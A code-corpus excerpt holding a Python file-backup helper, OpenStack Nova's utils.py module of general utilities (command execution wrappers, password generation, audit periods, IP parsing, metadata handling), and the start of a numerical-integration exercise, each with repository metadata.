return fnmatch.fnmatch(filename.upper(), pattern.upper())
def fnmatch_case_insensitve2(filename, patterns):
for pattern in patterns:
if fnmatch.fnmatch(filename.upper(), pattern.upper()):
return True
return False
def backup_rename(filepath):
"""
renamed filepath if it's a existing file by expand filename with last modified time
:param filepath: source file that should be renamed
"""
if os.path.isfile(filepath):
log.info("Create a backup of the old %r", filepath)
mtime = os.path.getmtime(filepath)
mtime = time.localtime(mtime)
bak_filepath = filepath + time.strftime("-%Y%m%d-%H%M%S")
if not os.path.isfile(bak_filepath + ".bak"):
bak_filepath += ".bak"
else:
count = 1
while os.path.isfile(bak_filepath + "-%01i.bak" % count):
count += 1
bak_filepath += "-%01i.bak" % count
os.rename(filepath, bak_filepath)
log.info("Backup as: %r", bak_filepath)
def rename_with_backup(old_filepath, new_filepath):
backup_rename(new_filepath)
log.info("Rename %r to %r", old_filepath, new_filepath)
os.rename(old_filepath, new_filepath)
if __name__ == '__main__':
from dragonlib.utils.logging_utils import setup_logging
setup_logging(
level=1 # hardcore debug ;)
# level=10 # DEBUG
# level=20 # INFO
# level=30 # WARNING
# level=40 # ERROR
# level=50 # CRITICAL/FATAL
# level=99
)
filepath = os.path.expanduser("~/dwload-files/AUTOLOAD.DWL")
backup_rename(filepath)
backup_rename(filepath)
backup_rename(filepath) | gpl-3.0 | 1,362,518,961,651,157,200 | 26.397727 | 87 | 0.604979 | false |
blueboxgroup/nova | nova/utils.py | 1 | 40394 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities and helper functions."""
import contextlib
import datetime
import functools
import hashlib
import hmac
import inspect
import os
import pyclbr
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from xml.sax import saxutils
import eventlet
import netaddr
from oslo_concurrency import lockutils
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import timeutils
import six
from nova import exception
from nova.i18n import _, _LE, _LW
notify_decorator = 'nova.notifications.notify_decorator'
monkey_patch_opts = [
cfg.BoolOpt('monkey_patch',
default=False,
help='Whether to log monkey patching'),
cfg.ListOpt('monkey_patch_modules',
default=[
'nova.api.ec2.cloud:%s' % (notify_decorator),
'nova.compute.api:%s' % (notify_decorator)
],
help='List of modules/decorators to monkey patch'),
]
utils_opts = [
cfg.IntOpt('password_length',
default=12,
help='Length of generated instance admin passwords'),
cfg.StrOpt('instance_usage_audit_period',
default='month',
help='Time period to generate instance usages for. '
'Time period must be hour, day, month or year'),
cfg.StrOpt('rootwrap_config',
default="/etc/nova/rootwrap.conf",
help='Path to the rootwrap configuration file to use for '
'running commands as root'),
cfg.StrOpt('tempdir',
help='Explicitly specify the temporary working directory'),
]
""" This group is for very specific reasons.
If you're:
- Working around an issue in a system tool (e.g. libvirt or qemu) where the fix
is in flight/discussed in that community.
- The tool can be/is fixed in some distributions and rather than patch the code
those distributions can trivially set a config option to get the "correct"
behavior.
This is a good place for your workaround.
Please use with care!
Document the BugID that your workaround is paired with."""
workarounds_opts = [
cfg.BoolOpt('disable_rootwrap',
default=False,
help='This option allows a fallback to sudo for performance '
'reasons. For example see '
'https://bugs.launchpad.net/nova/+bug/1415106'),
cfg.BoolOpt('disable_libvirt_livesnapshot',
default=True,
help='When using libvirt 1.2.2 fails live snapshots '
'intermittently under load. This config option provides '
'mechanism to disable livesnapshot while this is '
'resolved. See '
'https://bugs.launchpad.net/nova/+bug/1334398'),
cfg.BoolOpt('destroy_after_evacuate',
default=True,
help='Whether to destroy instances on startup when we suspect '
'they have previously been evacuated. This can result in '
'data loss if undesired. See '
'https://launchpad.net/bugs/1419785'),
]
CONF = cfg.CONF
CONF.register_opts(monkey_patch_opts)
CONF.register_opts(utils_opts)
CONF.import_opt('network_api_class', 'nova.network')
CONF.register_opts(workarounds_opts, group='workarounds')
LOG = logging.getLogger(__name__)
# used in limits
TIME_UNITS = {
'SECOND': 1,
'MINUTE': 60,
'HOUR': 3600,
'DAY': 86400
}
_IS_NEUTRON = None
synchronized = lockutils.synchronized_with_prefix('nova-')
SM_IMAGE_PROP_PREFIX = "image_"
SM_INHERITABLE_KEYS = (
'min_ram', 'min_disk', 'disk_format', 'container_format',
)
def vpn_ping(address, port, timeout=0.05, session_id=None):
"""Sends a vpn negotiation packet and returns the server session.
Returns Boolean indicating whether the vpn_server is listening.
Basic packet structure is below.
Client packet (14 bytes)::
0 1 8 9 13
+-+--------+-----+
|x| cli_id |?????|
+-+--------+-----+
x = packet identifier 0x38
cli_id = 64 bit identifier
? = unknown, probably flags/padding
Server packet (26 bytes)::
0 1 8 9 13 14 21 2225
+-+--------+-----+--------+----+
|x| srv_id |?????| cli_id |????|
+-+--------+-----+--------+----+
x = packet identifier 0x40
cli_id = 64 bit identifier
? = unknown, probably flags/padding
bit 9 was 1 and the rest were 0 in testing
"""
# NOTE(tonyb) session_id isn't used for a real VPN connection so using a
# cryptographically weak value is fine.
if session_id is None:
session_id = random.randint(0, 0xffffffffffffffff)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = struct.pack('!BQxxxxx', 0x38, session_id)
sock.sendto(data, (address, port))
sock.settimeout(timeout)
try:
received = sock.recv(2048)
except socket.timeout:
return False
finally:
sock.close()
fmt = '!BQxxxxxQxxxx'
if len(received) != struct.calcsize(fmt):
LOG.warning(_LW('Expected to receive %(exp)s bytes, '
'but actually %(act)s'),
dict(exp=struct.calcsize(fmt), act=len(received)))
return False
(identifier, server_sess, client_sess) = struct.unpack(fmt, received)
return (identifier == 0x40 and client_sess == session_id)
def _get_root_helper():
if CONF.workarounds.disable_rootwrap:
cmd = 'sudo'
else:
cmd = 'sudo nova-rootwrap %s' % CONF.rootwrap_config
return cmd
def execute(*cmd, **kwargs):
"""Convenience wrapper around oslo's execute() method."""
if 'run_as_root' in kwargs and 'root_helper' not in kwargs:
kwargs['root_helper'] = _get_root_helper()
return processutils.execute(*cmd, **kwargs)
def ssh_execute(dest, *cmd, **kwargs):
"""Convenience wrapper to execute ssh command."""
ssh_cmd = ['ssh', '-o', 'BatchMode=yes']
ssh_cmd.append(dest)
ssh_cmd.extend(cmd)
return execute(*ssh_cmd, **kwargs)
def trycmd(*args, **kwargs):
"""Convenience wrapper around oslo's trycmd() method."""
if 'run_as_root' in kwargs and 'root_helper' not in kwargs:
kwargs['root_helper'] = _get_root_helper()
return processutils.trycmd(*args, **kwargs)
def novadir():
import nova
return os.path.abspath(nova.__file__).split('nova/__init__.py')[0]
def generate_uid(topic, size=8):
characters = '01234567890abcdefghijklmnopqrstuvwxyz'
choices = [random.choice(characters) for _x in xrange(size)]
return '%s-%s' % (topic, ''.join(choices))
# Default symbols to use for passwords. Avoids visually confusing characters.
# ~6 bits per symbol
DEFAULT_PASSWORD_SYMBOLS = ('23456789', # Removed: 0,1
'ABCDEFGHJKLMNPQRSTUVWXYZ', # Removed: I, O
'abcdefghijkmnopqrstuvwxyz') # Removed: l
# ~5 bits per symbol
EASIER_PASSWORD_SYMBOLS = ('23456789', # Removed: 0, 1
'ABCDEFGHJKLMNPQRSTUVWXYZ') # Removed: I, O
def last_completed_audit_period(unit=None, before=None):
"""This method gives you the most recently *completed* audit period.
arguments:
units: string, one of 'hour', 'day', 'month', 'year'
Periods normally begin at the beginning (UTC) of the
period unit (So a 'day' period begins at midnight UTC,
a 'month' unit on the 1st, a 'year' on Jan, 1)
unit string may be appended with an optional offset
like so: 'day@18' This will begin the period at 18:00
UTC. 'month@15' starts a monthly period on the 15th,
and year@3 begins a yearly one on March 1st.
before: Give the audit period most recently completed before
<timestamp>. Defaults to now.
returns: 2 tuple of datetimes (begin, end)
The begin timestamp of this audit period is the same as the
end of the previous.
"""
if not unit:
unit = CONF.instance_usage_audit_period
offset = 0
if '@' in unit:
unit, offset = unit.split("@", 1)
offset = int(offset)
if before is not None:
rightnow = before
else:
rightnow = timeutils.utcnow()
if unit not in ('month', 'day', 'year', 'hour'):
raise ValueError('Time period must be hour, day, month or year')
if unit == 'month':
if offset == 0:
offset = 1
end = datetime.datetime(day=offset,
month=rightnow.month,
year=rightnow.year)
if end >= rightnow:
year = rightnow.year
if 1 >= rightnow.month:
year -= 1
month = 12 + (rightnow.month - 1)
else:
month = rightnow.month - 1
end = datetime.datetime(day=offset,
month=month,
year=year)
year = end.year
if 1 >= end.month:
year -= 1
month = 12 + (end.month - 1)
else:
month = end.month - 1
begin = datetime.datetime(day=offset, month=month, year=year)
elif unit == 'year':
if offset == 0:
offset = 1
end = datetime.datetime(day=1, month=offset, year=rightnow.year)
if end >= rightnow:
end = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 1)
begin = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 2)
else:
begin = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 1)
elif unit == 'day':
end = datetime.datetime(hour=offset,
day=rightnow.day,
month=rightnow.month,
year=rightnow.year)
if end >= rightnow:
end = end - datetime.timedelta(days=1)
begin = end - datetime.timedelta(days=1)
elif unit == 'hour':
end = rightnow.replace(minute=offset, second=0, microsecond=0)
if end >= rightnow:
end = end - datetime.timedelta(hours=1)
begin = end - datetime.timedelta(hours=1)
return (begin, end)
def generate_password(length=None, symbolgroups=DEFAULT_PASSWORD_SYMBOLS):
"""Generate a random password from the supplied symbol groups.
At least one symbol from each group will be included. Unpredictable
results if length is less than the number of symbol groups.
Believed to be reasonably secure (with a reasonable password length!)
"""
if length is None:
length = CONF.password_length
r = random.SystemRandom()
# NOTE(jerdfelt): Some password policies require at least one character
# from each group of symbols, so start off with one random character
# from each symbol group
password = [r.choice(s) for s in symbolgroups]
# If length < len(symbolgroups), the leading characters will only
# be from the first length groups. Try our best to not be predictable
# by shuffling and then truncating.
r.shuffle(password)
password = password[:length]
length -= len(password)
# then fill with random characters from all symbol groups
symbols = ''.join(symbolgroups)
password.extend([r.choice(symbols) for _i in xrange(length)])
# finally shuffle to ensure first x characters aren't from a
# predictable group
r.shuffle(password)
return ''.join(password)
def get_my_linklocal(interface):
try:
if_str = execute('ip', '-f', 'inet6', '-o', 'addr', 'show', interface)
condition = '\s+inet6\s+([0-9a-f:]+)/\d+\s+scope\s+link'
links = [re.search(condition, x) for x in if_str[0].split('\n')]
address = [w.group(1) for w in links if w is not None]
if address[0] is not None:
return address[0]
else:
msg = _('Link Local address is not found.:%s') % if_str
raise exception.NovaException(msg)
except Exception as ex:
msg = _("Couldn't get Link Local IP of %(interface)s"
" :%(ex)s") % {'interface': interface, 'ex': ex}
raise exception.NovaException(msg)
def xhtml_escape(value):
"""Escapes a string so it is valid within XML or XHTML.
"""
return saxutils.escape(value, {'"': '"', "'": '''})
def utf8(value):
"""Try to turn a string into utf-8 if possible.
Code is directly from the utf8 function in
http://github.com/facebook/tornado/blob/master/tornado/escape.py
"""
if isinstance(value, unicode):
return value.encode('utf-8')
assert isinstance(value, str)
return value
def check_isinstance(obj, cls):
"""Checks that obj is of type cls, and lets PyLint infer types."""
if isinstance(obj, cls):
return obj
raise Exception(_('Expected object of type: %s') % (str(cls)))
def parse_server_string(server_str):
"""Parses the given server_string and returns a tuple of host and port.
If it's not a combination of host part and port, the port element
is an empty string. If the input is invalid expression, return a tuple of
two empty strings.
"""
try:
# First of all, exclude pure IPv6 address (w/o port).
if netaddr.valid_ipv6(server_str):
return (server_str, '')
# Next, check if this is IPv6 address with a port number combination.
if server_str.find("]:") != -1:
(address, port) = server_str.replace('[', '', 1).split(']:')
return (address, port)
# Third, check if this is a combination of an address and a port
if server_str.find(':') == -1:
return (server_str, '')
# This must be a combination of an address and a port
(address, port) = server_str.split(':')
return (address, port)
except (ValueError, netaddr.AddrFormatError):
LOG.error(_LE('Invalid server_string: %s'), server_str)
return ('', '')
def is_valid_ipv6_cidr(address):
try:
netaddr.IPNetwork(address, version=6).cidr
return True
except (TypeError, netaddr.AddrFormatError):
return False
def get_shortened_ipv6(address):
addr = netaddr.IPAddress(address, version=6)
return str(addr.ipv6())
def get_shortened_ipv6_cidr(address):
net = netaddr.IPNetwork(address, version=6)
return str(net.cidr)
def is_valid_cidr(address):
"""Check if address is valid
The provided address can be a IPv6 or a IPv4
CIDR address.
"""
try:
# Validate the correct CIDR Address
netaddr.IPNetwork(address)
except netaddr.AddrFormatError:
return False
# Prior validation partially verify /xx part
# Verify it here
ip_segment = address.split('/')
if (len(ip_segment) <= 1 or
ip_segment[1] == ''):
return False
return True
def get_ip_version(network):
"""Returns the IP version of a network (IPv4 or IPv6).
Raises AddrFormatError if invalid network.
"""
if netaddr.IPNetwork(network).version == 6:
return "IPv6"
elif netaddr.IPNetwork(network).version == 4:
return "IPv4"
def safe_ip_format(ip):
"""Transform ip string to "safe" format.
Will return ipv4 addresses unchanged, but will nest ipv6 addresses
inside square brackets.
"""
try:
if netaddr.IPAddress(ip).version == 6:
return '[%s]' % ip
except (TypeError, netaddr.AddrFormatError): # hostname
pass
# it's IPv4 or hostname
return ip
def monkey_patch():
"""If the CONF.monkey_patch set as True,
this function patches a decorator
for all functions in specified modules.
You can set decorators for each modules
using CONF.monkey_patch_modules.
The format is "Module path:Decorator function".
Example:
'nova.api.ec2.cloud:nova.notifications.notify_decorator'
Parameters of the decorator is as follows.
(See nova.notifications.notify_decorator)
name - name of the function
function - object of the function
"""
# If CONF.monkey_patch is not True, this function do nothing.
if not CONF.monkey_patch:
return
# Get list of modules and decorators
for module_and_decorator in CONF.monkey_patch_modules:
module, decorator_name = module_and_decorator.split(':')
# import decorator function
decorator = importutils.import_class(decorator_name)
__import__(module)
# Retrieve module information using pyclbr
module_data = pyclbr.readmodule_ex(module)
for key in module_data.keys():
# set the decorator for the class methods
if isinstance(module_data[key], pyclbr.Class):
clz = importutils.import_class("%s.%s" % (module, key))
for method, func in inspect.getmembers(clz, inspect.ismethod):
setattr(clz, method,
decorator("%s.%s.%s" % (module, key, method), func))
# set the decorator for the function
if isinstance(module_data[key], pyclbr.Function):
func = importutils.import_class("%s.%s" % (module, key))
setattr(sys.modules[module], key,
decorator("%s.%s" % (module, key), func))
def convert_to_list_dict(lst, label):
"""Convert a value or list into a list of dicts."""
if not lst:
return None
if not isinstance(lst, list):
lst = [lst]
return [{label: x} for x in lst]
def make_dev_path(dev, partition=None, base='/dev'):
"""Return a path to a particular device.
>>> make_dev_path('xvdc')
/dev/xvdc
>>> make_dev_path('xvdc', 1)
/dev/xvdc1
"""
path = os.path.join(base, dev)
if partition:
path += str(partition)
return path
def sanitize_hostname(hostname):
"""Return a hostname which conforms to RFC-952 and RFC-1123 specs."""
if isinstance(hostname, unicode):
hostname = hostname.encode('latin-1', 'ignore')
hostname = re.sub('[ _]', '-', hostname)
hostname = re.sub('[^\w.-]+', '', hostname)
hostname = hostname.lower()
hostname = hostname.strip('.-')
return hostname
def read_cached_file(filename, cache_info, reload_func=None):
"""Read from a file if it has been modified.
:param cache_info: dictionary to hold opaque cache.
:param reload_func: optional function to be called with data when
file is reloaded due to a modification.
:returns: data from file
"""
mtime = os.path.getmtime(filename)
if not cache_info or mtime != cache_info.get('mtime'):
LOG.debug("Reloading cached file %s", filename)
with open(filename) as fap:
cache_info['data'] = fap.read()
cache_info['mtime'] = mtime
if reload_func:
reload_func(cache_info['data'])
return cache_info['data']
@contextlib.contextmanager
def temporary_mutation(obj, **kwargs):
"""Temporarily set the attr on a particular object to a given value then
revert when finished.
One use of this is to temporarily set the read_deleted flag on a context
object:
with temporary_mutation(context, read_deleted="yes"):
do_something_that_needed_deleted_objects()
"""
def is_dict_like(thing):
return hasattr(thing, 'has_key')
def get(thing, attr, default):
if is_dict_like(thing):
return thing.get(attr, default)
else:
return getattr(thing, attr, default)
def set_value(thing, attr, val):
if is_dict_like(thing):
thing[attr] = val
else:
setattr(thing, attr, val)
def delete(thing, attr):
if is_dict_like(thing):
del thing[attr]
else:
delattr(thing, attr)
NOT_PRESENT = object()
old_values = {}
for attr, new_value in kwargs.items():
old_values[attr] = get(obj, attr, NOT_PRESENT)
set_value(obj, attr, new_value)
try:
yield
finally:
for attr, old_value in old_values.items():
if old_value is NOT_PRESENT:
delete(obj, attr)
else:
set_value(obj, attr, old_value)
def generate_mac_address():
"""Generate an Ethernet MAC address."""
# NOTE(vish): We would prefer to use 0xfe here to ensure that linux
# bridge mac addresses don't change, but it appears to
# conflict with libvirt, so we use the next highest octet
# that has the unicast and locally administered bits set
# properly: 0xfa.
# Discussion: https://bugs.launchpad.net/nova/+bug/921838
mac = [0xfa, 0x16, 0x3e,
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(map(lambda x: "%02x" % x, mac))
def read_file_as_root(file_path):
"""Secure helper to read file as root."""
try:
out, _err = execute('cat', file_path, run_as_root=True)
return out
except processutils.ProcessExecutionError:
raise exception.FileNotFound(file_path=file_path)
@contextlib.contextmanager
def temporary_chown(path, owner_uid=None):
"""Temporarily chown a path.
:param owner_uid: UID of temporary owner (defaults to current user)
"""
if owner_uid is None:
owner_uid = os.getuid()
orig_uid = os.stat(path).st_uid
if orig_uid != owner_uid:
execute('chown', owner_uid, path, run_as_root=True)
try:
yield
finally:
if orig_uid != owner_uid:
execute('chown', orig_uid, path, run_as_root=True)
@contextlib.contextmanager
def tempdir(**kwargs):
argdict = kwargs.copy()
if 'dir' not in argdict:
argdict['dir'] = CONF.tempdir
tmpdir = tempfile.mkdtemp(**argdict)
try:
yield tmpdir
finally:
try:
shutil.rmtree(tmpdir)
except OSError as e:
LOG.error(_LE('Could not remove tmpdir: %s'), e)
def walk_class_hierarchy(clazz, encountered=None):
"""Walk class hierarchy, yielding most derived classes first."""
if not encountered:
encountered = []
for subclass in clazz.__subclasses__():
if subclass not in encountered:
encountered.append(subclass)
# drill down to leaves first
for subsubclass in walk_class_hierarchy(subclass, encountered):
yield subsubclass
yield subclass
class UndoManager(object):
"""Provides a mechanism to facilitate rolling back a series of actions
when an exception is raised.
"""
def __init__(self):
self.undo_stack = []
def undo_with(self, undo_func):
self.undo_stack.append(undo_func)
def _rollback(self):
for undo_func in reversed(self.undo_stack):
undo_func()
def rollback_and_reraise(self, msg=None, **kwargs):
"""Rollback a series of actions then re-raise the exception.
.. note:: (sirp) This should only be called within an
exception handler.
"""
with excutils.save_and_reraise_exception():
if msg:
LOG.exception(msg, **kwargs)
self._rollback()
def mkfs(fs, path, label=None, run_as_root=False):
"""Format a file or block device
:param fs: Filesystem type (examples include 'swap', 'ext3', 'ext4'
'btrfs', etc.)
:param path: Path to file or block device to format
:param label: Volume label to use
"""
if fs == 'swap':
args = ['mkswap']
else:
args = ['mkfs', '-t', fs]
# add -F to force no interactive execute on non-block device.
if fs in ('ext3', 'ext4', 'ntfs'):
args.extend(['-F'])
if label:
if fs in ('msdos', 'vfat'):
label_opt = '-n'
else:
label_opt = '-L'
args.extend([label_opt, label])
args.append(path)
execute(*args, run_as_root=run_as_root)
def last_bytes(file_like_object, num):
"""Return num bytes from the end of the file, and remaining byte count.
:param file_like_object: The file to read
:param num: The number of bytes to return
:returns (data, remaining)
"""
try:
file_like_object.seek(-num, os.SEEK_END)
except IOError as e:
if e.errno == 22:
file_like_object.seek(0, os.SEEK_SET)
else:
raise
remaining = file_like_object.tell()
return (file_like_object.read(), remaining)
def metadata_to_dict(metadata):
result = {}
for item in metadata:
if not item.get('deleted'):
result[item['key']] = item['value']
return result
def dict_to_metadata(metadata):
result = []
for key, value in metadata.iteritems():
result.append(dict(key=key, value=value))
return result
def instance_meta(instance):
if isinstance(instance['metadata'], dict):
return instance['metadata']
else:
return metadata_to_dict(instance['metadata'])
def instance_sys_meta(instance):
if not instance.get('system_metadata'):
return {}
if isinstance(instance['system_metadata'], dict):
return instance['system_metadata']
else:
return metadata_to_dict(instance['system_metadata'])
def get_wrapped_function(function):
"""Get the method at the bottom of a stack of decorators."""
if not hasattr(function, 'func_closure') or not function.func_closure:
return function
def _get_wrapped_function(function):
if not hasattr(function, 'func_closure') or not function.func_closure:
return None
for closure in function.func_closure:
func = closure.cell_contents
deeper_func = _get_wrapped_function(func)
if deeper_func:
return deeper_func
elif hasattr(closure.cell_contents, '__call__'):
return closure.cell_contents
return _get_wrapped_function(function)
def expects_func_args(*args):
def _decorator_checker(dec):
@functools.wraps(dec)
def _decorator(f):
base_f = get_wrapped_function(f)
arg_names, a, kw, _default = inspect.getargspec(base_f)
if a or kw or set(args) <= set(arg_names):
# NOTE (ndipanov): We can't really tell if correct stuff will
# be passed if it's a function with *args or **kwargs so
# we still carry on and hope for the best
return dec(f)
else:
raise TypeError("Decorated function %(f_name)s does not "
"have the arguments expected by the "
"decorator %(d_name)s" %
{'f_name': base_f.__name__,
'd_name': dec.__name__})
return _decorator
return _decorator_checker
class ExceptionHelper(object):
"""Class to wrap another and translate the ClientExceptions raised by its
function calls to the actual ones.
"""
def __init__(self, target):
self._target = target
def __getattr__(self, name):
func = getattr(self._target, name)
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except messaging.ExpectedException as e:
raise (e.exc_info[1], None, e.exc_info[2])
return wrapper
def check_string_length(value, name=None, min_length=0, max_length=None):
"""Check the length of specified string
:param value: the value of the string
:param name: the name of the string
:param min_length: the min_length of the string
:param max_length: the max_length of the string
"""
if not isinstance(value, six.string_types):
if name is None:
msg = _("The input is not a string or unicode")
else:
msg = _("%s is not a string or unicode") % name
raise exception.InvalidInput(message=msg)
if name is None:
name = value
if len(value) < min_length:
msg = _("%(name)s has a minimum character requirement of "
"%(min_length)s.") % {'name': name, 'min_length': min_length}
raise exception.InvalidInput(message=msg)
if max_length and len(value) > max_length:
msg = _("%(name)s has more than %(max_length)s "
"characters.") % {'name': name, 'max_length': max_length}
raise exception.InvalidInput(message=msg)
def validate_integer(value, name, min_value=None, max_value=None):
"""Make sure that value is a valid integer, potentially within range."""
try:
value = int(str(value))
except (ValueError, UnicodeEncodeError):
msg = _('%(value_name)s must be an integer')
raise exception.InvalidInput(reason=(
msg % {'value_name': name}))
if min_value is not None:
if value < min_value:
msg = _('%(value_name)s must be >= %(min_value)d')
raise exception.InvalidInput(
reason=(msg % {'value_name': name,
'min_value': min_value}))
if max_value is not None:
if value > max_value:
msg = _('%(value_name)s must be <= %(max_value)d')
raise exception.InvalidInput(
reason=(
msg % {'value_name': name,
'max_value': max_value})
)
return value
def spawn_n(func, *args, **kwargs):
"""Passthrough method for eventlet.spawn_n.
This utility exists so that it can be stubbed for testing without
interfering with the service spawns.
"""
eventlet.spawn_n(func, *args, **kwargs)
def is_none_string(val):
"""Check if a string represents a None value.
"""
if not isinstance(val, six.string_types):
return False
return val.lower() == 'none'
def convert_version_to_int(version):
try:
if isinstance(version, six.string_types):
version = convert_version_to_tuple(version)
if isinstance(version, tuple):
return reduce(lambda x, y: (x * 1000) + y, version)
except Exception:
msg = _("Hypervisor version %s is invalid.") % version
raise exception.NovaException(msg)
def convert_version_to_str(version_int):
version_numbers = []
factor = 1000
while version_int != 0:
version_number = version_int - (version_int // factor * factor)
version_numbers.insert(0, str(version_number))
version_int = version_int / factor
return reduce(lambda x, y: "%s.%s" % (x, y), version_numbers)
def convert_version_to_tuple(version_str):
return tuple(int(part) for part in version_str.split('.'))
def is_neutron():
global _IS_NEUTRON
if _IS_NEUTRON is not None:
return _IS_NEUTRON
try:
# compatibility with Folsom/Grizzly configs
cls_name = CONF.network_api_class
if cls_name == 'nova.network.quantumv2.api.API':
cls_name = 'nova.network.neutronv2.api.API'
from nova.network.neutronv2 import api as neutron_api
_IS_NEUTRON = issubclass(importutils.import_class(cls_name),
neutron_api.API)
except ImportError:
_IS_NEUTRON = False
return _IS_NEUTRON
def is_auto_disk_config_disabled(auto_disk_config_raw):
auto_disk_config_disabled = False
if auto_disk_config_raw is not None:
adc_lowered = auto_disk_config_raw.strip().lower()
if adc_lowered == "disabled":
auto_disk_config_disabled = True
return auto_disk_config_disabled
def get_auto_disk_config_from_instance(instance=None, sys_meta=None):
if sys_meta is None:
sys_meta = instance_sys_meta(instance)
return sys_meta.get("image_auto_disk_config")
def get_auto_disk_config_from_image_props(image_properties):
return image_properties.get("auto_disk_config")
def get_system_metadata_from_image(image_meta, flavor=None):
system_meta = {}
prefix_format = SM_IMAGE_PROP_PREFIX + '%s'
for key, value in image_meta.get('properties', {}).iteritems():
new_value = safe_truncate(unicode(value), 255)
system_meta[prefix_format % key] = new_value
for key in SM_INHERITABLE_KEYS:
value = image_meta.get(key)
if key == 'min_disk' and flavor:
if image_meta.get('disk_format') == 'vhd':
value = flavor['root_gb']
else:
value = max(value, flavor['root_gb'])
if value is None:
continue
system_meta[prefix_format % key] = value
return system_meta
def get_image_from_system_metadata(system_meta):
image_meta = {}
properties = {}
if not isinstance(system_meta, dict):
system_meta = metadata_to_dict(system_meta)
for key, value in system_meta.iteritems():
if value is None:
continue
# NOTE(xqueralt): Not sure this has to inherit all the properties or
# just the ones we need. Leaving it for now to keep the old behaviour.
if key.startswith(SM_IMAGE_PROP_PREFIX):
key = key[len(SM_IMAGE_PROP_PREFIX):]
if key in SM_INHERITABLE_KEYS:
image_meta[key] = value
else:
# Skip properties that are non-inheritable
if key in CONF.non_inheritable_image_properties:
continue
properties[key] = value
image_meta['properties'] = properties
return image_meta
def get_hash_str(base_str):
"""returns string that represents hash of base_str (in hex format)."""
return hashlib.md5(base_str).hexdigest()
if hasattr(hmac, 'compare_digest'):
constant_time_compare = hmac.compare_digest
else:
def constant_time_compare(first, second):
"""Returns True if both string inputs are equal, otherwise False.
This function should take a constant amount of time regardless of
how many characters in the strings match.
"""
if len(first) != len(second):
return False
result = 0
for x, y in zip(first, second):
result |= ord(x) ^ ord(y)
return result == 0
def filter_and_format_resource_metadata(resource_type, resource_list,
search_filts, metadata_type=None):
"""Get all metadata for a list of resources after filtering.
Search_filts is a list of dictionaries, where the values in the dictionary
can be string or regex string, or a list of strings/regex strings.
Let's call a dict a 'filter block' and an item in the dict
a 'filter'. A tag is returned if it matches ALL the filters in
a filter block. If more than one values are specified for a
filter, a tag is returned if it matches ATLEAST ONE value of the filter. If
more than one filter blocks are specified, the tag should match ALL the
filter blocks.
For example:
search_filts = [{'key': ['key1', 'key2'], 'value': 'val1'},
{'value': 'val2'}]
The filter translates to 'match any tag for which':
((key=key1 AND value=val1) OR (key=key2 AND value=val1)) AND
(value=val2)
This example filter will never match a tag.
:param resource_type: The resource type as a string, e.g. 'instance'
:param resource_list: List of resource objects
:param search_filts: Filters to filter metadata to be returned. Can be
dict (e.g. {'key': 'env', 'value': 'prod'}, or a list of dicts
(e.g. [{'key': 'env'}, {'value': 'beta'}]. Note that the values
of the dict can be regular expressions.
:param metadata_type: Provided to search for a specific metadata type
(e.g. 'system_metadata')
:returns: List of dicts where each dict is of the form {'key':
'somekey', 'value': 'somevalue', 'instance_id':
'some-instance-uuid-aaa'} if resource_type is 'instance'.
"""
if isinstance(search_filts, dict):
search_filts = [search_filts]
def _get_id(resource):
if resource_type == 'instance':
return resource.get('uuid')
def _match_any(pattern_list, string):
if isinstance(pattern_list, str):
pattern_list = [pattern_list]
return any([re.match(pattern, string)
for pattern in pattern_list])
def _filter_metadata(resource, search_filt, input_metadata):
ids = search_filt.get('resource_id', [])
keys_filter = search_filt.get('key', [])
values_filter = search_filt.get('value', [])
output_metadata = {}
if ids and _get_id(resource) not in ids:
return {}
for k, v in six.iteritems(input_metadata):
# Both keys and value defined -- AND
if (keys_filter and values_filter and
not _match_any(keys_filter, k) and
not _match_any(values_filter, v)):
continue
# Only keys or value is defined
elif ((keys_filter and not _match_any(keys_filter, k)) or
(values_filter and not _match_any(values_filter, v))):
continue
output_metadata[k] = v
return output_metadata
formatted_metadata_list = []
for res in resource_list:
if resource_type == 'instance':
# NOTE(rushiagr): metadata_type should be 'metadata' or
# 'system_metadata' if resource_type is instance. Defaulting to
# 'metadata' if not specified.
if metadata_type is None:
metadata_type = 'metadata'
metadata = res.get(metadata_type, {})
for filt in search_filts:
# By chaining the input to the output, the filters are
# ANDed together
metadata = _filter_metadata(res, filt, metadata)
for (k, v) in metadata.items():
formatted_metadata_list.append({'key': k, 'value': v,
'%s_id' % resource_type: _get_id(res)})
return formatted_metadata_list
def safe_truncate(value, length):
"""Safely truncates unicode strings such that their encoded length is
no greater than the length provided.
"""
b_value = encodeutils.safe_encode(value)[:length]
# NOTE(chaochin) UTF-8 character byte size varies from 1 to 6. If
# truncating a long byte string to 255, the last character may be
# cut in the middle, so that UnicodeDecodeError will occur when
# converting it back to unicode.
decode_ok = False
while not decode_ok:
try:
u_value = encodeutils.safe_decode(b_value)
decode_ok = True
except UnicodeDecodeError:
b_value = b_value[:-1]
return u_value
| apache-2.0 | -4,700,980,457,302,506,000 | 31.84065 | 79 | 0.599025 | false |
Drapegnik/bsu | numerical-analysis/sem4/lab2/scripts.py | 1 | 1076 | A = -2.0
B = 2.0
eps = [0.5 * pow(10, -1 * i) for i in range(3, 8, 2)]
def f(x):
return float(x * (3 ** x + 1) ** (-1))
def rect(h):
int_sum = 0
x = A + h / 2.0
while x < B:
int_sum += f(x)
x += h
return h * int_sum
def trap(h):
int_sum = 0
x = A
while x < B:
int_sum += h * (f(x) + f(x + h))
x += h
return 0.5 * int_sum
def simp(h):
int_sum1 = 0
int_sum2 = 0
